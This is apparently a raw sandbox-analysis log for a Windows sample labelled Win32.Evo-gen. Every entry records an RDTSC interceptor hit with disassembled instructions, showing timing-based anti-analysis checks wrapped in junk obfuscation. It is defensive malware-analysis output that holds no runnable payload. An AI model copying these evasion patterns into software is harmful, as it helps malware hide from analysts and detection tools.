Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D958FC second address: D95901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D95901 second address: D95928 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FC734E5F78Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D960E3 second address: D960E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9649D second address: D964A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D964A1 second address: D964A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D964A7 second address: D964B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D964B1 second address: D964F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d jne 00007FC73488207Ch 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FC734882088h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007FC734882076h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96620 second address: D96662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dx, FD79h 0x00000011 lea eax, dword ptr [ebp+12479FE2h] 0x00000017 xor di, 64B3h 0x0000001c nop 0x0000001d je 00007FC734E5F787h 0x00000023 push edi 0x00000024 jmp 00007FC734E5F77Fh 0x00000029 pop edi 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96662 second address: D7CF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC73488207Ch 0x0000000c js 00007FC734882076h 0x00000012 popad 0x00000013 nop 0x00000014 sbb di, E0DAh 0x00000019 sbb ecx, 7009D88Ah 0x0000001f call dword ptr [ebp+122D380Eh] 0x00000025 jnc 00007FC734882097h 0x0000002b jp 00007FC73488207Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC45F second address: DCC469 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC734E5F776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC5F1 second address: DCC5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC5FA second address: DCC605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC734E5F776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC8AF second address: DCC8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC8CA second address: DCC8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC8CF second address: DCC8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCCBA1 second address: DCCBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Eh 0x00000009 jmp 00007FC734E5F77Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD4354 second address: DD4358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD4358 second address: DD435C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD4496 second address: DD44A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC734882076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD48B6 second address: DD4907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F786h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d je 00007FC734E5F77Ah 0x00000013 push ecx 0x00000014 jmp 00007FC734E5F77Eh 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007FC734E5F785h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD520E second address: DD5217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5217 second address: DD5221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5221 second address: DD5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5227 second address: DD5234 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC734E5F778h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5234 second address: DD5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC734882076h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jo 00007FC734882095h 0x00000016 jmp 00007FC734882089h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDAB7D second address: DDAB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F787h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD96F8 second address: DD9704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD9704 second address: DD9719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F781h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD9719 second address: DD9721 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD9721 second address: DD9726 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDA9DF second address: DDA9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDA9EC second address: DDA9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDA9FD second address: DDAA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FC734882076h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDCD2A second address: DDCD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDCD2E second address: DDCD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC734882087h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE109C second address: DE10A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE1205 second address: DE1228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC734882085h 0x0000000e jmp 00007FC73488207Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE13A8 second address: DE13D5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 jbe 00007FC734E5F776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC734E5F788h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE1569 second address: DE1579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE1579 second address: DE1585 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE54CD second address: DE54DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC734882076h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE54DD second address: DE54F1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC734E5F776h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE57E9 second address: DE57EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE5AA8 second address: DE5AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE5AAC second address: DE5AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FC734882076h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEA1B1 second address: DEA1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC734E5F782h 0x0000000c ja 00007FC734E5F776h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEA98B second address: DEA99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEA99E second address: DEA9B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEAAE9 second address: DEAAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC734882076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEF338 second address: DEF33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170133 second address: 5170137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170137 second address: 517013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517013B second address: 5170141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170141 second address: 5170150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170150 second address: 5170154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170154 second address: 5170169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov cx, F6E3h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170169 second address: 51701A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC73488207Fh 0x00000008 pop eax 0x00000009 call 00007FC734882089h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movzx ecx, di 0x0000001b push ebx 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B60 second address: 5190B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B7D second address: 5190B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B99 second address: 5190B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B9D second address: 5190BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190BBA second address: 5190BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190BC0 second address: 5190BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov eax, edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190706 second address: 519070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519070C second address: 5190722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC73488207Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190722 second address: 5190769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 36BAh 0x00000007 pushfd 0x00000008 jmp 00007FC734E5F77Bh 0x0000000d add si, 1E5Eh 0x00000012 jmp 00007FC734E5F789h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC734E5F77Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190769 second address: 519076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519076F second address: 5190773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190684 second address: 51906A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ax, 83DBh 0x00000010 mov esi, 25A782B7h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51906A7 second address: 51906B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0E91 second address: 51D0EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC734882088h 0x00000011 jmp 00007FC734882085h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC73488207Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0EEB second address: 51D0F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov eax, 535C7FB9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov si, 6CF1h 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC734E5F782h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F1A second address: 51D0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F20 second address: 51D0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F26 second address: 51D0F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F2A second address: 51D0F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B031E second address: 51B0356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC73488207Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ax, 140Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0356 second address: 51B038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A446h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734E5F782h 0x00000016 or cl, FFFFFFE8h 0x00000019 jmp 00007FC734E5F77Bh 0x0000001e popfd 0x0000001f mov ch, 08h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B038B second address: 51B0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0391 second address: 51B03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
